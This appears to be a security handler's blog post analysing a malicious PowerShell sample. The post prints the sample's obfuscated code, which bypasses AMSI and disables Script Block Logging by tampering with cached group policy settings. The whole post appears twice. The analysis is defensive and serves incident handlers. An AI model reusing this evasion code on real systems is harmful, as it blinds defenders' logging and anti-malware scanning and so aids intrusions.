PowerShell has a great built-in feature called "Script Block Logging"[1]. It helps to record all activities performed by a script and is a goldmine for incident handlers. That's the reason why attackers tend to try to disable this feature. There are many ways to achieve this, but I found an interesting one.
The obfuscation technique uses a "Collections.Generic.Dictionary" object. This type of collection represents a collection of keys and values. Here is the interesting code (I kept only the code relevant to the collection:
$wi=(('EnableSc{2}ip{1'+'}{3'+'}'+'lo'+'c'+'{0}Logging')-f'k','t','r','B'); $db9=[Collections.Generic.Dictionary[string,System.Object]]::new(); $iN=(('{0}crip{2}'+'B{'+'1}ockL'+'ogg'+'ing')-f'S','l','t'); If($PSVersionTable.PSVersion.Major -ge 3) { $zz=[Ref].Assembly.GetType((('S{5}stem.'+'{'+'3}anagem'+'ent'+'.{0'+'}{4}tomation.{2}ti{'+'1}'+'s')-f'A','l','U','M','u','y')); $zqu=[Ref].Assembly.GetType((('{5}{6}'+'st{9'+'}m.{2'+'}'+'a'+'na{3'+'}{'+'9}'+'m{9'+'}'+'nt.{'+'8}{0}t'+'{'+'7'+'}'+'ma'+'ti{'+'7}n'+'.{'+'8'+'}msi{1}ti{4}s')-f'u','U','M','g','l','S','y','o','A','e')); $rH=(('E'+'na{0}l'+'eSc{3}ipt{1'+'}loc'+'{4}{2}nvoc'+'ation{5}oggi'+'n'+'g')-f'b','B','I','r','k','L'); $xTv=$zz.GetField('cachedGroupPolicySettings','NonPublic,Static'); if ($zqu) { $zqu.GetField((('a{3'+'}{4}i'+'I{0'+'}'+'i'+'tF'+'ail{2'+'}{1'+'}') f'n','d','e','m','s'),'NonPublic,Static').SetValue($null,$true); }; If ($xTv) { $iG5H=$xTv.GetValue($null); $db9.Add($wi,0); $db9.Add($rH,0); $iG5H['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$iN]=$db9; The collection of values is created in the $db9 variable. Later two keys are added, and the collection is used to modify the registry to disable the logging feature.
[DBG]: PS C:\Users\REM>> $db9 Key Value --- ----- EnableScriptBlockLogging 0 EnableScriptBlockInvocationLogging 0
The remaining part of the script is classic and injects a shellcode in the Powershell process.
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
PowerShell has a great built-in feature called "Script Block Logging"[1]. It helps to record all activities performed by a script and is a goldmine for incident handlers. That's the reason why attackers tend to try to disable this feature. There are many ways to achieve this, but I found an interesting one.
The obfuscation technique uses a "Collections.Generic.Dictionary" object. This type of collection represents a collection of keys and values. Here is the interesting code (I kept only the code relevant to the collection:
$wi=(('EnableSc{2}ip{1'+'}{3'+'}'+'lo'+'c'+'{0}Logging')-f'k','t','r','B'); $db9=[Collections.Generic.Dictionary[string,System.Object]]::new(); $iN=(('{0}crip{2}'+'B{'+'1}ockL'+'ogg'+'ing')-f'S','l','t'); If($PSVersionTable.PSVersion.Major -ge 3) { $zz=[Ref].Assembly.GetType((('S{5}stem.'+'{'+'3}anagem'+'ent'+'.{0'+'}{4}tomation.{2}ti{'+'1}'+'s')-f'A','l','U','M','u','y')); $zqu=[Ref].Assembly.GetType((('{5}{6}'+'st{9'+'}m.{2'+'}'+'a'+'na{3'+'}{'+'9}'+'m{9'+'}'+'nt.{'+'8}{0}t'+'{'+'7'+'}'+'ma'+'ti{'+'7}n'+'.{'+'8'+'}msi{1}ti{4}s')-f'u','U','M','g','l','S','y','o','A','e')); $rH=(('E'+'na{0}l'+'eSc{3}ipt{1'+'}loc'+'{4}{2}nvoc'+'ation{5}oggi'+'n'+'g')-f'b','B','I','r','k','L'); $xTv=$zz.GetField('cachedGroupPolicySettings','NonPublic,Static'); if ($zqu) { $zqu.GetField((('a{3'+'}{4}i'+'I{0'+'}'+'i'+'tF'+'ail{2'+'}{1'+'}') f'n','d','e','m','s'),'NonPublic,Static').SetValue($null,$true); }; If ($xTv) { $iG5H=$xTv.GetValue($null); $db9.Add($wi,0); $db9.Add($rH,0); $iG5H['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$iN]=$db9; The collection of values is created in the $db9 variable. Later two keys are added, and the collection is used to modify the registry to disable the logging feature.
[DBG]: PS C:\Users\REM>> $db9 Key Value --- ----- EnableScriptBlockLogging 0 EnableScriptBlockInvocationLogging 0
The remaining part of the script is classic and injects a shellcode in the Powershell process.
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
